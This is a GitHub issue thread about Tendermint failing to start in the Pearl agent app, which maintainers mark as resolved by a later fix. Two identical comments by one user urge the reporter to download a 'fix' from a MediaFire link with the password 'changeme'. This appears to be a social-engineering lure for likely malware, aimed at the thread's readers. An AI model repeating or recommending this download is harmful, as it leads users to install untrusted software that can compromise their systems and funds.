### ISSUE TITLE
Tendermint not starting – Agent doesn't earn rewards

### ISSUE THREAD

**Issue by oaksprout** [valory-xyz/olas-operate-app#312]
[pearl_logs_2024-08-30T23_00_02.626Z-0.1.0-rc120.zip](https://github.com/user-attachments/files/16823459/pearl_logs_2024-08-30T23_00_02.626Z-0.1.0-rc120.zip)

<img width="705" alt="image" src="https://github.com/user-attachments/assets/5d7cb709-e7e3-46d0-9564-3466108c61bf">

Severity: critical. Blocks the happy path of a vocal user.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by truemiller** [comment]
This should be resolved in #326.
Can we close @oaksprout?

**Comment by oaksprout** [comment]
Yep @truemiller
